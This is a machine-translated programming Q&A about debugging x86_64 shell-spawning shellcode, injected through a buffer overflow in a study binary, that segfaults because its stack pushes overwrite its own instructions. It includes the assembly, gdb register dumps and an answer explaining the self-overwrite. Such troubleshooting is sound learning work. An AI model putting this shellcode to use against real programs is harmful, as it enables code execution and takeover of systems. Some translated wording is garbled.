linux - 为什么程序会在推送指令上捕获 SIGSEGV?
问题描述
编写了一个简单的 x86_64 shellcode:
BITS 64
xor rax, rax
push rax
push 0x68732f6e
push 0x69622f2f
mov rbx, rsp
push rax
mov rdx, rsp
push rbx
mov rcx, rsp
mov al, 221
int 0x80
通过缓冲区溢出,shellcode 被发送到处理器。一切顺利,直到执行完最后的第三条指令(push rbx)。然后程序捕获 SIGSEGV 并且永远不会到达珍贵的中断 - int 0x80。我想也许堆栈溢出了,我在 shellcode 的开头插入了几个弹出指令。结果,SIGSEGV 在同一条指令上更改为 SIGILL - push rbx。根本没有任何想法。广发银行:
=> 0x7fffffffea72: mov rdx,rsp
0x7fffffffea75: push rbx
0x7fffffffea76: mov rcx,rsp
0x7fffffffea79: mov al,0xdd
0x7fffffffea7b: int 0x80
0x7fffffffea7d: (bad)
0x7fffffffea7e: (bad)
0x7fffffffea7f: inc DWORD PTR [rax]
-----------------------------------------------------------------------------------------------------------------------------
0x00007fffffffea72 in ?? ()
gdb$ n
-----------------------------------------------------------------------------------------------------------------------[regs]
RAX: 0x0000000000000000 RBX: 0x00007FFFFFFFEA88 RBP: 0xFFFFFFFFFFFFFFFF RSP: 0x00007FFFFFFFEA80 o d I t s Z a P c
RDI: 0x00007FFFFFFFEA60 RSI: 0x0000555555556021 RDX: 0x00007FFFFFFFEA80 RCX: 0x60FFFFFFFFFFFFFF RIP: 0x00007FFFFFFFEA75
R8 : 0x0000000000000000 R9 : 0x00007FFFF7FE14C0 R10: 0xFFFFFFFFFFFFF8F5 R11: 0x00007FFFF7E54B60 R12: 0x0000555555555060
R13: 0x0000000000000000 R14: 0x0000000000000000 R15: 0x0000000000000000
CS: 0033 DS: 0000 ES: 0000 FS: 0000 GS: 0000 SS: 002B
-----------------------------------------------------------------------------------------------------------------------[code]
=> 0x7fffffffea75: push rbx
0x7fffffffea76: mov rcx,rsp
0x7fffffffea79: mov al,0xdd
0x7fffffffea7b: int 0x80
0x7fffffffea7d: (bad)
0x7fffffffea7e: (bad)
0x7fffffffea7f: inc DWORD PTR [rax]
0x7fffffffea81: add BYTE PTR [rax],al
-----------------------------------------------------------------------------------------------------------------------------
0x00007fffffffea75 in ?? ()
gdb$ n
Program received signal SIGSEGV, Segmentation fault.
-----------------------------------------------------------------------------------------------------------------------[regs]
RAX: 0x0000000000000000 RBX: 0x00007FFFFFFFEA88 RBP: 0xFFFFFFFFFFFFFFFF RSP: 0x00007FFFFFFFEA78 o d I t s Z a P c
RDI: 0x00007FFFFFFFEA60 RSI: 0x0000555555556021 RDX: 0x00007FFFFFFFEA80 RCX: 0x60FFFFFFFFFFFFFF RIP: 0x00007FFFFFFFEA76
R8 : 0x0000000000000000 R9 : 0x00007FFFF7FE14C0 R10: 0xFFFFFFFFFFFFF8F5 R11: 0x00007FFFF7E54B60 R12: 0x0000555555555060
R13: 0x0000000000000000 R14: 0x0000000000000000 R15: 0x0000000000000000
CS: 0033 DS: 0000 ES: 0000 FS: 0000 GS: 0000 SS: 002B
信息过程映射:
gdb$ info proc mappings
process 3025
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x555555554000 0x555555555000 0x1000 0x0 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x555555555000 0x555555556000 0x1000 0x1000 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x555555556000 0x555555557000 0x1000 0x2000 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x555555557000 0x555555558000 0x1000 0x2000 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x555555558000 0x555555559000 0x1000 0x3000 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x7ffff7dbb000 0x7ffff7dbd000 0x2000 0x0
0x7ffff7dbd000 0x7ffff7de3000 0x26000 0x0 /usr/lib/libc-2.32.so
0x7ffff7de3000 0x7ffff7f30000 0x14d000 0x26000 /usr/lib/libc-2.32.so
0x7ffff7f30000 0x7ffff7f7c000 0x4c000 0x173000 /usr/lib/libc-2.32.so
0x7ffff7f7c000 0x7ffff7f7f000 0x3000 0x1be000 /usr/lib/libc-2.32.so
0x7ffff7f7f000 0x7ffff7f82000 0x3000 0x1c1000 /usr/lib/libc-2.32.so
0x7ffff7f82000 0x7ffff7f88000 0x6000 0x0
0x7ffff7fca000 0x7ffff7fce000 0x4000 0x0 [vvar]
0x7ffff7fce000 0x7ffff7fd0000 0x2000 0x0 [vdso]
0x7ffff7fd0000 0x7ffff7fd2000 0x2000 0x0 /usr/lib/ld-2.32.so
0x7ffff7fd2000 0x7ffff7ff3000 0x21000 0x2000 /usr/lib/ld-2.32.so
0x7ffff7ff3000 0x7ffff7ffc000 0x9000 0x23000 /usr/lib/ld-2.32.so
0x7ffff7ffc000 0x7ffff7ffd000 0x1000 0x2b000 /usr/lib/ld-2.32.so
0x7ffff7ffd000 0x7ffff7fff000 0x2000 0x2c000 /usr/lib/ld-2.32.so
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
gdb$
New question: Changed the shellcode to the following:
BITS 64
pop rax
pop rax
pop rax
pop rax
xor rax, rax
push rax
push 0x68732f6e
push 0x69622f2f
mov rbx, rsp
push rax
mov rdx, rsp
push rbx
mov rcx, rsp
mov al, 221
int 0x80
通过这样做,我可以防止我的 shellcode 被覆盖。因此:
gdb$ ni
--------------------------------------------------------------------------
---------------------------------------------[regs]
RAX: 0x0000000000000000 RBX: 0x00007FFFFFFFEAA8 RBP: 0xFFFFFFFFFFFFFFFF RSP:
0x00007FFFFFFFEAA0 o d I t s Z a P c
RDI: 0x00007FFFFFFFEA60 RSI: 0x0000555555556021 RDX: 0x00007FFFFFFFEAA0 RCX:
0x60FFFFFFFFFFFFFF RIP: 0x00007FFFFFFFEA79
R8 : 0x0000000000000000 R9 : 0x00007FFFF7FE14C0 R10: 0xFFFFFFFFFFFFF8F5 R11:
0x00007FFFF7E54B60 R12: 0x0000555555555060
R13: 0x0000000000000000 R14: 0x0000000000000000 R15: 0x0000000000000000
CS: 0033 DS: 0000 ES: 0000 FS: 0000 GS: 0000 SS: 002B
--------------------------------------------------------------------------
---------------------------------------------[code]
=> 0x7fffffffea79: push rbx
0x7fffffffea7a: mov rcx,rsp
0x7fffffffea7d: mov al,0xdd
0x7fffffffea7f: int 0x80
0x7fffffffea81: (bad)
0x7fffffffea82: (bad)
0x7fffffffea83: (bad)
0x7fffffffea84: (bad)
--------------------------------------------------------------------------------
---------------------------------------------
0x00007fffffffea79 in ?? ()
gdb$ ni
Program received signal SIGILL, Illegal instruction.
--------------------------------------------------------------------------
---------------------------------------------[regs]
RAX: 0xFFFFFFFFFFFFFFF7 RBX: 0x00007FFFFFFFEAA8 RBP: 0xFFFFFFFFFFFFFFFF RSP:
0x00007FFFFFFFEA98 o d I t s Z a P c
RDI: 0x00007FFFFFFFEA60 RSI: 0x0000555555556021 RDX: 0x00007FFFFFFFEAA0 RCX:
0x00007FFFFFFFEA98 RIP: 0x00007FFFFFFFEA81
R8 : 0x0000000000000000 R9 : 0x00007FFFF7FE14C0 R10: 0xFFFFFFFFFFFFF8F5 R11:
0x00007FFFF7E54B60 R12: 0x0000555555555060
R13: 0x0000000000000000 R14: 0x0000000000000000 R15: 0x0000000000000000
CS: 0033 DS: 0000 ES: 0000 FS: 0000 GS: 0000 SS: 002B
--------------------------------------------------------------------------
---------------------------------------------[code]
=> 0x7fffffffea81: (bad)
0x7fffffffea82: (bad)
0x7fffffffea83: (bad)
0x7fffffffea84: (bad)
0x7fffffffea85: (bad)
0x7fffffffea86: (bad)
0x7fffffffea87: (bad)
0x7fffffffea88: (bad)
--------------------------------------------------------------------------------
---------------------------------------------
0x00007fffffffea81 in ?? ()
gdb$
解决方案
两个问题。
首先,您使用的是n
GDB 命令,该命令应该跳转到下一个源代码行,这可能需要很多指令。(并且当您执行不属于二进制文件的代码时,行号无论如何都没有意义,n
也不会可靠地工作。)您希望使用它ni
,或者更好的是si
,它将始终只执行一条指令而无需尝试跳过子程序调用等。
实际上,请注意段RIP
错误后寄存器转储中的值。这不是你的地址push rbx
,所以这不是出错的指令;相反,它是下面的指令,你本来应该是mov rcx, rsp
。
一个简单的寄存器移动如何导致段错误?因为它不再是注册移动 - 你只是覆盖了它。比较 RSP 和 RIP 的值。您正在执行堆栈中的代码,并push rbx
存储到 address 0x00007FFFFFFFEA78
,而 themov rcx, rsp
是从 开始的三字节指令0x7fffffffea76
。所以你只是覆盖了它的第三个字节。如果你做另一个disassemble
或x/i $rip
此时,你会看到你最终执行的指令——我敢打赌它会访问内存。
事实上,mov rcx, rsp
被编码为48 89 e1
. rbx
is的低字节0x88
,并用覆盖第三个字节88
产生48 89 88 xx xx xx xx
which is mov [rax+disp], rcx
。
推荐阅读
- html - 是否可以保留输入占位符中的部分内容?
- react-native - 发布请求后更新按钮而不更新整个屏幕
- sql - 在 SQL 中使用 case 表达式按年龄分组
- java - java.lang.ClassCastException 在 Spring 应用程序启动时发生
- amazon-web-services - 从 dynamoDb 中提取数据并将其移动到另一个表的最佳方法
- java - 制作没有标签的折线图
- azure - 手动编辑 Azure 数据工厂 V1 中的管道查询
- angular - 我要返还金额
- javascript - stoppropagation 如何与循环一起工作?
- python - 自动查找曲线拟合(或图形反卷积)中的最佳峰数